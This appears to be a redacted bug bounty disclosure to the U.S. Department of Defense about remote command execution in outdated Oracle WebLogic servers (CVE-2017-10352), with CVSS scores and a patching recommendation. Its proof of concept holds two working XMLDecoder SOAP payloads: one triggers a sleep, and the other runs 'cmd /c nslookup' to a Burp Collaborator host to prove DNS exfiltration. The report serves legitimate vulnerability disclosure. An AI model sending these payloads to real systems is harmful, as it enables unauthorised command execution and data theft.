Sp1d3rsH1:634630U.S. Dept Of Defense: Remote OS command Execution in the 3 more Oracle Weblogic on the ████████, ████, ███████ [CVE-2017-10352]
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
39.1%
##Description
Hello. I was able to identify 3 more RCE vulnerabilities due to the outdated Oracle Weblogic instance on the █████████, ███, █████
After my previous discoveries I decided to dig deeper into the ███.mil scope/IP space and found other instances of vulnerable Oracle WebLogic. I decided to fill all this additional findings in the single report
##POC
This request to the https://█████████/wls-wsat/CoordinatorPortType will trigger sleep for 10 seconds (same applies for ████████, ███████):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: █████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep">
<long>10000</long>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
The next request will resolve custom Burp Collaborator hostname via nslookup OS command to prove that it’s possible to exfiltrate data via DNS:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ███
Content-Length: 724
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index = "0">
<string>cmd</string>
</void>
<void index = "1">
<string>/c</string>
</void>
<void index = "2">
<string>nslookup j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Note: to reproduce the second case with nslookup, j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net host should be replaced by your own Burp Collaborator instance to catch the DNS request
##Suggested fix
Patching WebLogic to the resent version will fix the issue.
Impact
Remote OS command execution.
Related
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
39.1%